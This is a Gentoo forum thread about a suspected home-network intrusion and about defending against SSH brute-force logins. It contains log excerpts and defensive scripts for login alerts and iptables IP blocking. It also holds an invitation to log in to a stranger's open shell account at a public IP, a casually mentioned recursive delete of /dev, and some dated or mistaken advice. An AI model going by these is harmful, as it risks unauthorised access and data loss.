1.) The guy came in over the router. Weird stuff stopped when it got downed, so I guess my wireless bridge is more or less secure still...  :Confused: 

2.) Possibly he gained access to my gf's box, which runs the latest "x86" GAIM on top of Gentoo (2.6.2-gentoo-r6 kernel)  :Shocked: 

3.) He probably was able to send wake-on-lan packets to muck with the other boxen on the network  :Embarassed: 

4.) I need to secure my network better. ASAP!  :Evil or Very Mad: 

What was going on? Since I wasn't there to witness the whole event, I'm a bit skeptical about it all, but concerned nonetheless. I do fear that whoever was sending on-screen messages got root access though (which my gf doesn't have, even though the account can do "su".) so I'll be reading up on security a bit more than I was.

Are there any known vulnerabilities in GAIM that attackers can use to hijack a box in this manner?

It makes for a funny story, actually, but does anyone have a suggestion? Thanks for the time and don't bother trying not to laugh. Hell, even I had to chuckle about it...  :Laughing: 

----------

## alex6z

The thing it, when you make your box public, it defeats the point of hacking it. What's the point if the person your hacking doesn't care? Go hack your own box!

----------

## lbrtuk

 *alex6z wrote:*   

> The thing it, when you make your box public, it defeats the point of hacking it. What's the point if the person your hacking doesn't care? Go hack your own box!

 

That's all well and fine until your machine is being used as a spam relay, being used as a ddos drone, or is set up to relay child porn / stolen credit card numbers etc.

----------

## jamapii

 *red-wolf76 wrote:*   

> Then she panics and shuts down her Linux box but it starts up again, as does my Win2000 box (which was off in the first place!). However - she claims - my box kept shutting down again and trying to rise a couple of times.

 Some other box besides hers might be infested. Something must have sent those wake-on-lan packages.

 *Quote:*   

> (she uses GAIM for that and YAHOO! on her box)

 gaim had some security issues recently, possibly it's not over yet *Quote:*   

> 1.) The guy came in over the router. Weird stuff stopped when it got downed, so I guess my wireless bridge is more or less secure still... 

 WPA is generally considered OK, but I prefer openvpn.

The simple X window could be the Windows Message Service (if enabled in /etc/samba/smb.conf - it's "message command") (it is used in Windows to pop up windows with spam).

----------

## red-wolf76

 *jamapii wrote:*   

>  *red-wolf76 wrote:*   Then she panics and shuts down her Linux box but it starts up again, as does my Win2000 box (which was off in the first place!). However - she claims - my box kept shutting down again and trying to rise a couple of times. Some other box besides hers might be infested. Something must have sent those wake-on-lan packages.

 I'll check for that. Are there any good tools for finding out if your box has been rooted or otherwise infected? *Quote:*   

>  *Quote:*   (she uses GAIM for that and YAHOO! on her box) gaim had some security issues recently, possibly it's not over yet

 I'll turn off the direct connections for now. That ought to stop the most obvious POE. *Quote:*   

>  *Quote:*   1.) The guy came in over the router. Weird stuff stopped when it got downed, so I guess my wireless bridge is more or less secure still...  WPA is generally considered OK, but I prefer openvpn.

 I'm not sure the APs are capable of that, but I'll have a look. *Quote:*   

> The simple X window could be the Windows Message Service (if enabled in /etc/samba/smb.conf - it's "message command") (it is used in Windows to pop up windows with spam).

 Ah, that'll go too then, if it is installed. I do use a SMB-utility to access the Win2K file shares when necessary.

Thanks for the pointers. I'm itching to get home and have a look.

----------

## Zepp

The package chkrootkit will try and look for installed rootkits, if they did that. Not sure otherwise how you can tell other then to watch it carefully, or unless they didn't erase some logs :/

----------

## jamapii

 *red-wolf76 wrote:*   

> I'll check for that. Are there any good tools for finding out if your box has been rooted or otherwise infected?

  ... and rkhunter.

 *Quote:*   

>  *Quote:*   WPA is generally considered OK, but I prefer openvpn. I'm not sure the APs are capable of that, but I'll have a look.

 Recent APs should be capable of WPA, but openvpn is usually only done by computers. (client(s) <-> server)

----------

## red-wolf76

 *jamapii wrote:*   

>  *red-wolf76 wrote:*   I'll check for that. Are there any good tools for finding out if your box has been rooted or otherwise infected?  ... and rkhunter.
> 
>  *Quote:*    *Quote:*   WPA is generally considered OK, but I prefer openvpn. I'm not sure the APs are capable of that, but I'll have a look. Recent APs should be capable of WPA, but openvpn is usually only done by computers. (client(s) <-> server)

 Thanks for the pointers. Neither rkhunter nor chkrootkit found any abnormalities on the supposedly affected system. I do have root login over ssh enabled, but only from LAN IPs (if God is indeed merciful and my config correct) however so I can muck about on the box from my PC when my gf uses it.  :Embarassed: 

So far the guy hasn't turned up again, so if I don't find anything on the other boxen, I'll check it off as a (probably relatively harmless) "sK1Rp7-K1Dd3e"-Intrusion along the lines of "Behold my mighty sexual prowess as I make your computer start up using a packet!"  :Confused: 

Or it's all urban legend, I didn't witness the incident after all...  :Rolling Eyes: 

P.S.: The APs are WEP-enabled. D-Link has issues using WPA in Bridge Mode - God knows why!  :Crying or Very sad: 

----------

## Zepp

Don't enable direct root login for ssh, just add whatever use you want, like yours, to the wheel group and then login to that user via ssh and su to root.

----------

## red-wolf76

 *Zepp wrote:*   

> Don't enable direct root login for ssh, just add whatever use you want, like yours, to the wheel group and then login to that user via ssh and su to root.

 Actually, this seriously sounds like a Good Thing. It's what I do when I access the machines directly to avoid running KDE (or Gnome on another box) as root.

Just for an annoyingly dumb question ( :Embarassed: ), though: Why exactly is allowing root SSH logins while restricting it to a trusted list of IPs a Bad Thing? Is it because of spoofing IPs?

----------

## Zepp

Ya IPs and MAC adresses can be spoofed so it isn't really a great idea to depend on them for security that much :/

----------

## agrippa_cash

My XFS (and therefore X) didn't start a couple days ago, so I went through the logs and saw that someone did a ssh portscan of my computer.  I thought that maybe I was hacked so I booted with an Insert knoppix disk and ran chkrootkit and rkhunter and the second alerted me that signs of GasKit were found on my system.  The positive sign of GasKit was a /dev/dev.  As the second dev had an entire system's worth of devs, I'm inclined to believe that this is an artifact from when I first began messing around with udev.  No rootkit binaries or scripts were found and once I rm -Rf'ed /dev/* the warning disappeared. 

X started fine once I rm'ed /tmp, so I think I may have cut the power on my surge protector too early and maybe some lock file was still in place causing xfs to fail.  At least I hope this is the case.  You confirmation would be appreciated.

PS:  I have ssh root disabled, and almost no network services running.

----------

## SwiftWind

Holy cow...I checked my logs, there have been so many attempts.  I have no idea how to check if there were any successful ones. For some reason in the SSHD folder its only keeping logs for the last 2 days. Can someone recommend what logs I should look for any successful logins? and in what directory?

I want to make sure no one got anything.

Thank you for your time.

----------

## whiskers

 *Captain_Loser wrote:*   

> Wow, I just looked through my logs and found a whole lot of failed ssh logins, and what I guess are rootkit attempts.. I am very surprised to see this many cracking attempts aimed at me. I am running a very safe system, but it makes you think.. I am sure glad gentoo has things like emerge -u.

 

what is a "very safe system" and how can you get it there?

----------

## meu

 *SwiftWind wrote:*   

> Holy cow...I checked my logs, there have been so many attempts.  I have no idea how to check if there were any successful ones. For some reason in the SSHD folder its only keeping logs for the last 2 days. Can someone recommend what logs I should look for any successful logins? and in what directory?
> 
> 

 

You can use the `last` command to see users who logged into the system. Although, this can only help if attacker haven't got root access, in which case he could just change the logs.

----------

## hollywoodcole

 *alex6z wrote:*   

> I have (an) open account(s) on my system. I put them there to see who would login and wait and see what they try to do.  I just don't get why people are so scared.  They shouldn't be able to get root access from the account.  I have it set up with limits and outgoing firewall so they can't use an IRC bot.  So far nothing too interesting has happened .  
> 
> 2005-07-19 my dynamic IP is ssh://admin@12.223.170.28/  try it out.  I know it's risky allowing anonymous shell access, but it's still safer than windows and I really don't care anyway, computer are just toys for me 

 

Nice work alex, I have been checking the bash_history for a while now and am finding some funny things!

i.e. 

/sbin/shutdown -r 1

----------

## segedunum

 *Quote:*   

> The simple fact is that running any service whatsoever, on any port, is a security hazard. The only truly secure network is the one you don't build, and the only truly secure computer is in a concrete bunker, under armed guard, with console access only, etc. Even then, there are various points of attack one could use to gain access, if one really wanted to. 

 

That's the usual cop-out rubbish I'm afraid. There are certain things you can do to make your system more secure, and piping SSH and other admin tools through a VPN is definitely one of them.

 *Quote:*   

> It is currently fashionable for 1337 $cr!p+ k!ddi3z to hit systems running SSH.

 

Which is why I recommend, not unreasonably, not running SSH and piping it through something else.

 *Quote:*   

> Security-compromising errors have been found before in ipsec-tools, and if one wanted one could probably attempt to mount an attack against IPSec.

 

Is that more or less likely than an attack on a public SSH server resulting in a compromise?

 *Quote:*   

> OpenVPN is a great piece of software (I use it extensively), but I'm sure that a programming error will slip in at some point and that an attack could be devised against it.

 

Yes, and it's far more difficult to mount an attack on this than on a running, publicly available SSH server. It's going to be that much more difficult to find a compromise. It's a question of who's your worst enemy.

 *Quote:*   

> But for right now, SSH is a far more inviting target: so many more people use it

 

Errr, yes - which is why I recommend piping your SSH and other admin tools through a VPN. It's the best, and most secure option. I also think you're misunderstanding things in that you're assuming that if VPN usage gets more popular than SSH then VPNs will be hacked, including Microsoft. That's normal tosh a a lot of people tend to assume. No one claims a VPN is uncompromisable, but having a VPN using a set of secured, signed and trusted certificates is going to be a heck of a lot tougher to have a script-kiddy go at than a public SSH server.

Think about it.

----------

## labrador

 *alex6z wrote:*   

> I have (an) open account(s) on my system. I put them there to see who would login and wait and see what they try to do.  I just don't get why people are so scared.  They shouldn't be able to get root access from the account.  I have it set up with limits and outgoing firewall so they can't use an IRC bot.  So far nothing too interesting has happened .  
> 
> 2005-07-19 my dynamic IP is ssh://admin@12.223.170.28/  try it out.  I know it's risky allowing anonymous shell access, but it's still safer than windows and I really don't care anyway, computer are just toys for me 

 

I was going to take a look but ssh to thath box timed out, and nmap says it

can't be found with a standard probe.

Have you heard of shell fork bomb attacks?  Did you set up limits

to prevent that sort of abuse?  Perhaps that's why I can't get on it?

There is no such thing as "safe" with a system you've set up with no

password and advertised to the whole world is wide open.  Would you

leave your house unlocked, then publish an ad in the newspaper

that such and such an address is not locked?

----------

## christsong84

 *labrador wrote:*   

>  *alex6z wrote:*   I have (an) open account(s) on my system. I put them there to see who would login and wait and see what they try to do.  I just don't get why people are so scared.  They shouldn't be able to get root access from the account.  I have it set up with limits and outgoing firewall so they can't use an IRC bot.  So far nothing too interesting has happened .  
> 
> 2005-07-19 my dynamic IP is ssh://admin@12.223.170.28/  try it out.  I know it's risky allowing anonymous shell access, but it's still safer than windows and I really don't care anyway, computer are just toys for me  
> 
> I was going to take a look but ssh to thath box timed out, and nmap says it
> ...

 

note the date of that post and the fact that it's a dynamic IP (which was stated).  THat's probably more the reason you can't get into it...it's somewhere else by now.

----------

## philidias

you need to get hacking preventing software such as zone alarms.  Turn off your internet connection. Scan you computer.

----------

## krazykit

 *philidias wrote:*   

> you need to get hacking preventing software such as zone alarms.  Turn off your internet connection. Scan you computer.

 

Do you have any idea what you said?  "zone alarms" possibly means a Windows software firewall known as ZoneAlarm.  If you're asking to scan our computers with ZoneAlarm (again, Windows software, and it doesn't do this anyway)... Why are you posting advice when you can't even get the OS right?

----------

## bakaohki

I shouldn't even bother to post, because what I'm saying is so trivial: USE A DEDICATED FIREWALL  :Evil or Very Mad: . Everyone out there. You can use Gentoo, Debian, whatever; I prefer FloppyFW with a fanless dumb P1 75mhz (put together from used garbage). And of course use strong passwords and iptables firewalls for the internal machines. Duh. Surfing on the net without a firewall is like walking around in the city without clothes; if you have weak passwords and opened ssh ports, then it means you're a hot babe without clothes in the worst area of the city at midnight waving a sign "kidnap me"...

----------

## audiodef

I think someone may have been trying to use my Gentoo box at my office, after hours. I had it up and running one day, screen locked, and logged out the next day. At best, someone hit the computer's reset button, but where would I look to find out exactly what happened? I know it's probably not a power failure because 1. another computer was still on the way I left it and 2. I don't think computer is not set up to reboot after a power failure.

----------

## jamapii

There is /var/log/syslog

If it was xlock, maybe it crashed.

Maybe someone switched it off for some reason, then changed their mind and switched it on again.

...

----------

## trip

how do you turn of passwd-less logins? and is making a passwd-less acount as easy as not typing any when creating the acount? sorry for the noobs questions but i want to know exactly what to do in the litle time i have.  :Very Happy: 

tnx in advance

----------

## quantus

 *trip wrote:*   

> how do you turn of passwd-less logins? and is making a passwd-less acount as easy as not typing any when creating the acount? sorry for the noobs questions but i want to know exactly what to do in the litle time i have. :D
> 
> tnx in advance

 

I'm a littly fuzzy on your question...  see if these this helps you out: Hardening PAM

----------

## nhaggin

Reply a little late to this, but I didn't see it until now....

 *segedunum wrote:*   

>  *Quote:*   The simple fact is that running any service whatsoever, on any port, is a security hazard. The only truly secure network is the one you don't build, and the only truly secure computer is in a concrete bunker, under armed guard, with console access only, etc. Even then, there are various points of attack one could use to gain access, if one really wanted to.  
> 
> That's the usual cop-out rubbish I'm afraid.

 

It might interest you to know that I'm not running a public SSH server, and that I do use OpenVPN to remotely administer my machine.

As to the rest of your reply: I was not attempting to ridicule your advice, nor was I making several of the assumptions you suggested I was; if my choice of language implied that, I apologize. I meant to indicate that, if one hardens one's SSH setup, one can expose it to the Internet, even on port 22, without immediate and grave danger, although there is still some danger present. IOW, it's not completely insane to have publicly-available SSH, although, as you have indicated, certain other systems are more secure.

----------

## robinmdh

```
Oct  2 10:52:23 [sshd] Invalid user anna from 210.6.64.3

Oct  2 10:52:31 [sshd] Invalid user arthur from 210.6.64.3

Oct  2 10:52:38 [sshd] Invalid user aron from 210.6.64.3

Oct  2 10:52:42 [sshd] Invalid user austin from 210.6.64.3

Oct  2 10:52:46 [sshd] Invalid user barbara from 210.6.64.3

Oct  2 10:52:50 [sshd] Invalid user bart from 210.6.64.3

Oct  2 10:52:53 [sshd] Invalid user ben from 210.6.64.3

Oct  2 10:52:57 [sshd] Invalid user beny from 210.6.64.3

Oct  2 10:53:02 [sshd] Invalid user bert from 210.6.64.3

Oct  2 10:53:05 [sshd] Invalid user bill from 210.6.64.3

Oct  2 10:53:13 [sshd] Invalid user bind from 210.6.64.3

Oct  2 10:53:17 [sshd] Invalid user bob from 210.6.64.3

Oct  2 10:53:20 [sshd] Invalid user bobby from 210.6.64.3

Oct  2 10:53:24 [sshd] Invalid user bret from 210.6.64.3

Oct  2 10:53:27 [sshd] Invalid user brian from 210.6.64.3

Oct  2 10:53:31 [sshd] Invalid user bruce from 210.6.64.3

Oct  2 10:53:36 [sshd] Invalid user carl from 210.6.64.3

Oct  2 10:53:39 [sshd] Invalid user carol from 210.6.64.3

Oct  2 10:53:45 [sshd] Invalid user cesar from 210.6.64.3

Oct  2 10:53:48 [sshd] Invalid user clark from 210.6.64.3

Oct  2 10:53:51 [sshd] Invalid user clinton from 210.6.64.3

Oct  2 10:53:55 [sshd] Invalid user corinna from 210.6.64.3

Oct  2 10:53:59 [sshd] Invalid user craig from 210.6.64.3

Oct  2 10:54:02 [sshd] Invalid user daniel from 210.6.64.3

Oct  2 10:54:06 [sshd] Invalid user danny from 210.6.64.3

Oct  2 10:54:11 [sshd] Invalid user dave from 210.6.64.3

Oct  2 10:54:14 [sshd] Invalid user dexter from 210.6.64.3

Oct  2 10:54:18 [sshd] Invalid user dick from 210.6.64.3

Oct  2 10:54:21 [sshd] Invalid user earl from 210.6.64.3

Oct  2 10:54:26 [sshd] Invalid user ed from 210.6.64.3

Oct  2 10:54:30 [sshd] Invalid user eddie from 210.6.64.3

Oct  2 10:54:33 [sshd] Invalid user edgar from 210.6.64.3

Oct  2 10:54:37 [sshd] Invalid user ellen from 210.6.64.3

Oct  2 10:54:40 [sshd] Invalid user emil from 210.6.64.3

Oct  2 10:54:45 [sshd] Invalid user enzo from 210.6.64.3

Oct  2 10:54:48 [sshd] Invalid user felix from 210.6.64.3

Oct  2 10:54:52 [sshd] Invalid user fred from 210.6.64.3

Oct  2 10:54:57 [sshd] Invalid user francis from 210.6.64.3

Oct  2 10:55:02 [sshd] Invalid user harry from 210.6.64.3

Oct  2 10:55:06 [sshd] Invalid user ian from 210.6.64.3

Oct  2 10:55:10 [sshd] Invalid user ismail from 210.6.64.3

Oct  2 10:55:20 [sshd] Invalid user james from 210.6.64.3

Oct  2 10:55:24 [sshd] Invalid user jesse from 210.6.64.3

```

lol

don't think i've been hacked but will step up on security!

----------

## pengatom

I've got 23 000 "Failed password" logins the laste 3 months... Changed the ssh port, hopfully it gets better  :Smile: 

In my iptables I've written:

iptables -A INPUT -p TCP --dport ssh -i ${WAN} -j ACCEPT

would the "ssh" port number change to whatever I set i sshd_conf, or does "ssh" mean port 22?

btw, if I try to set a "easy" password on a user, gentoo tells me this, anyone know what this definition on a "BAD password" is?

----------

## Malcolm

I've gotten alot of these break-in attempts aswell, both through SSH and FTP.  My suggestion is to setup an auto blacklisting script like ssh black.

I've had this setup on my system for 3 days now and the blacklist always has 5-10 IPs, rotating of course  :Smile: 

----------

## Errtu

I got tired of maintaining blacklists, scripts and other stuff to keep 'm out, so i just configured sshd to listen on a higher IP. Since i've done that i get no more of these attempts. And my logfile stays a bit cleaner too  :Smile: 

----------

## Bigun

I just grepped over my log and have about 2,000+ pages of attempts ranging back from August of this year.

All of them lame dictionary attempts.  Does reporting these IP's to their respective ISP's help anything?

----------

## christsong84

 *bigun89 wrote:*   

> I just grepped over my log and have about 2,000+ pages of attempts ranging back from August of this year.
> 
> All of them lame dictionary attempts.  Does reporting these IP's to their respective ISP's help anything?

 

sometimes but not often.  I generally report those IP's to them anyways...might as well, it can't hurt anything.  I've gotten three ISP's who've actually done something and asked me to let them know if things happen again.  :Smile: 

----------

## oracleofmist

on top of being behind a router firewall that drops all incoming connections except to specified ports w/ specified protocols i've also take the libery of changing my ftp, ssh services to high port numbers. good practice?

----------

## Bigun

 *oracleofmist wrote:*   

> on top of being behind a router firewall that drops all incoming connections except to specified ports w/ specified protocols i've also take the libery of changing my ftp, ssh services to high port numbers. good practice?

 

Ehh... that's more of security by obscurity... but at the very least will keep bot attempts out.

----------

## chrispolderman

Is there a solid way to traceback the ip number in question and obtaining the abuse email address for the corresponding ISP or am I just speaking nonsense here?

Would be a nice script: more than 20 password tries logged and a process would automatically file a complaint to the corresponding ISP...

Is this possible (apart from spoofed IP's ofcourse)..?

Chris

----------

## dsb

My traceroute shows they are coming from China

----------

## shiggity s

Those crazy Chinese hackers

----------

## Cinder6

I've been getting some from South Korea, and a couple that IP locators can't find  :Sad: 

----------

## Monkeh

 *bigun89 wrote:*   

>  *oracleofmist wrote:*   on top of being behind a router firewall that drops all incoming connections except to specified ports w/ specified protocols i've also take the libery of changing my ftp, ssh services to high port numbers. good practice? 
> 
> Ehh... that's more of security by obscurity... but at the very least will keep bot attempts out.

 

There's nothing wrong with security by obscurity, in fact it's a good practice. Just don't rely on it.

----------

## heartburn

I'm not sure if it's been mentioned yet on this thread (it's a very long thread). But you can configure sshd to use DSA authentication instead of PasswordAuthentication. Then, a cracker would need an existing user's private key to use ssh.

You can find the instructions here:

http://www.gentoo.org/doc/en/articles/openssh-key-management-p1.xml?style=printable

Also, logwatch makes a nice daily report of login attempts:

```
--------------------- SSHD Begin ------------------------ 

 

 Didn't receive an ident from these IPs:

    xxx.xxx.com (xxx.xxx.xxx.xxx): 1 Time(s)

    xxx.xxx.com (xxx.xxx.xxx.xxx): 1 Time(s)

    xxx.xxx.com (xxx.xxx.xxx.xxx): 1 Time(s)

 

 Failed logins from these:

    invalid user admin (password) from ::ffff:xxx.xxx.xxx.xxx: 1 Time(s)

    invalid user administrator (password) from ::ffff:xxx.xxx.xxx.xxx: 1 Time(s)

    invalid user carol (password) from ::ffff:xxx.xxx.xxx.xxx: 2 Time(s)

    invalid user jack (password) from ::ffff:xxx.xxx.xxx.xxx: 1 Time(s)

    invalid user marvin (password) from ::ffff:xxx.xxx.xxx.xxx: 1 Time(s)

    root/password from ::ffff:xxx.xxx.xxx.xxx: 31 Time(s)

 Users logging in through sshd:

    jblow:

       xxx.xxx.net (xxx.xxx.xxx.xxx): 4 times

 

 ---------------------- SSHD End -------------------------  
```

I also have a script to page me when someone succefully logs on through ssh. That's not too practical if you have lots of users. But it's good if you aren't expecting any logins. I think I stole this script from somewhere else in this forum (my apologies to its author).

```

# Send a brief alert with connection details

#

when=`/usr/bin/date`

where=`echo $SSH_CONNECTION|cut -f1 -d' '|cut -f4 -d:`

if [ -z "$SSH_TTY" ] ; then

  what="Connect by $USER"

else

  what="Login by $USER on $SSH_TTY"

fi

mailto=""

cc_to=""

bcc_to=""

while read address mode

do

  if [ -z "$address" -o "${address:0:1}" = "#" ] ; then continue; fi

  if [ "x$mode" = "xcc" -o "x$mode" = "xCC" ] ; then

    cc_to=${cc_to:+${cc_to},}$address

  elif [ "x$mode" = "xbcc" -o "x$mode" = "xBCC" ] ; then

    bcc_to=${bcc_to:+${bcc_to},}$address

  else

    mailto=${mailto:+${mailto},}$address

  fi

done </etc/ssh/notify

mailto=${mailto:-operator}

cc_to=${cc_to:+"-c $cc_to"}

bcc_to=${bcc_to:+"-b $bcc_to"}

mail ${cc_to} ${bcc_to} -s "SSH Alert" ${mailto} >&2 <<-EOM

  ${what} from ${where} at ${when}

EOM

```

~~~~~EDIT~~~~~

I just did a search and it seems that I stole the script from timeBandit. He has written an excellent HOW-TO about it here:

https://forums.gentoo.org/viewtopic-t-393795-highlight-send+brief+alert+connection+details.htmlLast edited by heartburn on Thu Nov 03, 2005 11:28 pm; edited 1 time in total

----------

## abaelinor

aaLast edited by abaelinor on Tue Oct 21, 2008 4:28 am; edited 1 time in total

----------

## heartburn

like I said, I stole it from timeBandit. He deserves the credit. But I've been using it for about two weeks and it works great. I love hearing my phone make a satisfying chirp every time I log on. And I like hearing nothing when I'm not logging on even better  :Smile: 

----------

## d11wtq

Hopefully I've not missed something... I just read 16 pages of thread very quickly.  What a great thread!

I run a web server.  I'm not being paranoid but this has made me think a lot about security considerations.  One thing that worries me is that I have set up user accounts for friends & family on my server (shell accounts/ftp/virtualhost apache accounts) so they can host websites too.

Everyone seems to only be mentioning SSH attacks... all of my users (most know virtually nothing about *nix) have shell access by SSH.  The worrying thing is that I'm relying upon them to use secure passwords too now. How can I force increased password security?  I want them all to login and do a passwd, then I want passwd to make sure their passwords:

a) Contain at least 8 characters

b) Contain at least 2 numbers

c) Contain a mixture of uppercase and lowercase letters

passwd already forces at least *6* chars but the rest is perfectly allowed  :Sad: 

I'm amazed we're only discussing SSH.  Is FTP any security risk? It uses the same passwords as the shell access and all users are chrooted to their home directory.  Hell... I've even been told you can compromise a box by telnetting to port 80 (HTTP) and doing some magic  :Confused: 

I've already installed and changed a few configs during the course of this thread... I may as well do this extra thing with the passwords too.  I'll run a "last" command every so often so that users who aren't using SSH have their access removed temporarily too.  They'd just get a message upon successful login which says that they need to contact me to have their access re-enabled and then it disconnects again.

Password criteria help anyone?

----------

## Errtu

d11wtq:

Justdoing some searching on freshmeat gives these projects:

http://freshmeat.net/projects/pam_pwcheck/

- The pam_pwcheck is a PAM module for password strength checking

http://freshmeat.net/projects/pam_passwdqc/

- pam_passwdqc is a simple password strength checking module for PAM-aware password changing programs, such as passwd(1). 

Maybe one of these could be of help?

Leon

----------

## d11wtq

Thanks. I've emerged pam_passwdqc so that should help. I haven't set it up yet but it looks simple enough  :Very Happy: 

----------

## iothal

Perhaps this can be of use to somebody.

Caveat, I'm not a good scripter...

cronjob:

#!/bin/sh

 grep "Invalid user" /var/log/auth.log | gawk '{print $10}'|sort -u > /tmp/drop

 grep "Failed password for root from" /var/log/auth.log | gawk '{print $11}'|sort -u >> /tmp/drop

 cat /etc/badips >> /tmp/drop

 cat /tmp/drop | sort -u > /tmp/dropu

 #Compare dropu and badips, only drop

 #members who are in dropu but not in badips

 #Drop them

 /sbin/drop.pl

 cp /tmp/dropu /etc/badips

 rm /tmp/drop

 rm /tmp/dropu

perlscript:

#!/usr/bin/perl -w

 # point to wherever you keep /sbin/iptables

 my $iptables='/sbin/iptables';

 my $alreadyBlocked = '/etc/badips';

 my $couldBeAssholes = '/tmp/dropu';

#Sanity check

open(BLOCKED, $alreadyBlocked) || die("Could not open block file!");

open(NEW, $couldBeAssholes) || die("Could not open prospects file!");

#Read could be assholes and if not found in alreadyblocked

#yeah... smack them!

my @blocked = <BLOCKED>;

my @new = <NEW>;

my %seen;                  # lookup table for already blocked

my @notblocked;                 # not already blocked

# build lookup table

foreach $item (@blocked) { $seen{$item} = 1 }

foreach $entry(@new)

{

        push(@notblocked,$entry) unless $seen{$entry};

        $seen{$entry} = 1;

}

my $block="32";

my $target = "NOLOGDUMP";

my $chain = "INPUT";

my $inf = "eth0";

foreach $entry(@notblocked)

{

        chomp($entry);

        #print "Dropping: ".$entry."\n";

        system("$iptables -A $chain -i $inf -s $entry/$block -j $target");

}

iptables ( stolen from a previous post in this thread):

#Chain to drop script kiddies

iptables -N NOLOGDUMP > /dev/null

iptables -F NOLOGDUMP

iptables -A NOLOGDUMP -p tcp -j REJECT --reject-with tcp-reset

iptables -A NOLOGDUMP -p udp -j REJECT --reject-with icmp-port-unreachable

iptables -A NOLOGDUMP -j DROP

Oh, and u probably need to touch /etc/badips before the first run.

Enjoy!

----------

## assaf

LOL @ this thread... Good thing i'm running sshd on port xyxyx...   :Rolling Eyes: 

----------

## sloof3

We've all done it before but there is already a better tool to check the logs for failed logins: http://denyhosts.sourceforge.net/

----------

## LostControl

 *sloof3 wrote:*   

> We've all done it before but there is already a better tool to check the logs for failed logins: http://denyhosts.sourceforge.net/

 

And do not forget Fail2ban  :Wink:  It is now in Portage.

----------

## blommethomas

just read through a few messages of this threads.

I'm not a professional, but I'm installing LINUX now.

My dad has got a LINUX comp already and he was informed by e-mail about attempts to connect to the Internet, anyone knows more about this?

----------

## fuzzythebear

This thread ( and by jove was it long to read it all .. ; ) 

we seen a lot about remote logins and ssh .. but and this might be good 

for a new thread how about physical security ? 

If the attacker is in fact a theif coing in and stealing a disk in a 

tray or stealing the machine ? How would we be able to make

sure that the data would be safe from prying eyes.. 

Ex . we all know that the OS need not be running on a particular disk to 

be able to read it and use it .. 

How would we go about to protect the data in that kind of an occurence ? 

Is it possible to make the data unreadable without a floppy in the drive ? 

a small usb key or somethign else i have no clue about ? 

In fact .. once the disk is out the machine , is there any way at all to protect

the data ? 

Fuzzy

----------

## heartburn

fuzzythebear,

that's why god created data centers. Physical security is just that: physical. Sure, there's encryption... maybe even self-destruction. But nothing beats a few well-trained, highly paid, professional armed guards standing outside the 6-inch thick, retina-scanning steel doors of a natural-disaster-proof, underground building complete with around-the-clock video surveillance and an identically equipped backup facility on another continent. Or, you could just lock the machine in the basement. I guess it all depends on what you're trying to protect. But if you're worried about people who actually come in contact with the machine, you need to think physical. Software solutions will be secondary.

d11wtq,

You really should read about the DSA authentication.

http://www.gentoo.org/doc/en/articles/openssh-key-management-p1.xml?style=printable

You can configure your machine to use DSA authentication instead of PAM. Then, passwords are almost a non-issue. Nobody can even get to a login prompt without a valid private key. After I set up DSA-only authentication on my webserver, I went from literally hundreds of failed login attempts per day to zero (not counting my own fat-fingered passphrase misspellings). It's definitely worth it.

- mark

----------

## heartburn

One more thing I did recently was set to set up a daily cron job to emerge and run chkrootkit. I know that many people run chkrootkit as a cron job, but I was thinking that if I was cracking a system, I might want to replace chkrootkit with a script that produces a false report. So I figured the best thing to do is rebuild it right before I run it each time. I suppose that could be faked too. Unfortunately, my machine is hosted so I don't have the option of putting an unwritable version in the CD drive. Any thoughts?

I also started running psad. That's the port scan detection system configured by bastille. It looks pretty good, but I can't find very much information about it on the web. Is anyone else using it? Does anyone have any tips on configuring it?

 - mark

----------

## mutlu_inek

 *fuzzythebear wrote:*   

> Is it possible to make the data unreadable

 

How about encryption?

E.g. http://gentoo-wiki.com/SECURITY_System_Encryption_DM-Crypt_with_LUKS (or forum search)

added:

http://gentoo-wiki.com/SECURITY_FileSystem_Encryption_without_ROOT

http://gentoo-wiki.com/HOWTO_Encrypt_Your_Home_Directory_Using_CFS

----------

## AmosMutke

 *heartburn wrote:*   

> One more thing I did recently was set to set up a daily cron job to emerge and run chkrootkit. I know that many people run chkrootkit as a cron job, but I was thinking that if I was cracking a system, I might want to replace chkrootkit with a script that produces a false report. So I figured the best thing to do is rebuild it right before I run it each time. I suppose that could be faked too. Unfortunately, my machine is hosted so I don't have the option of putting an unwritable version in the CD drive. Any thoughts?
> 
> 

 

would mounting a partition read-only have the same effect of a cdrom?  Are there any additional security risks since the media isn't physically read-only?  Clearly, even root can't force data to write on a normal CD.

maybe this could be a viable option for people who don't have a cdrom drive on their system.

----------

## MrUlterior

 *heartburn wrote:*   

> One more thing I did recently was set to set up a daily cron job to emerge and run chkrootkit. I know that many people run chkrootkit as a cron job, but I was thinking that if I was cracking a system, I might want to replace chkrootkit with a script that produces a false report. So I figured the best thing to do is rebuild it right before I run it each time. I suppose that could be faked too. Unfortunately, my machine is hosted so I don't have the option of putting an unwritable version in the CD drive. Any thoughts?
> 
> I also started running psad. That's the port scan detection system configured by bastille. It looks pretty good, but I can't find very much information about it on the web. Is anyone else using it? Does anyone have any tips on configuring it?
> 
>  - mark

 

That's a waste of time, last I checked chkrootkit depends on external binaries, if these are compromised, regardless of how often you rebuild chkrootkit, the results will be false. Unless you want to re-emerge your base system before each test.

Why not just use tripwire/aide/swatch/whatever and monitor your binaries for changes? If you're a good *nix citizen you've mounted every other location "noexec" so besides /bin & /usr there's nowhere else a rootkit could install & execute its components. Actually more likely you've done the usual one partition for "/" and everything on it ... I'm not going to get into that discussion again tho  :Smile: 

----------

## yottabit

28,036 unsuccessful attempts in one month... Unreal.

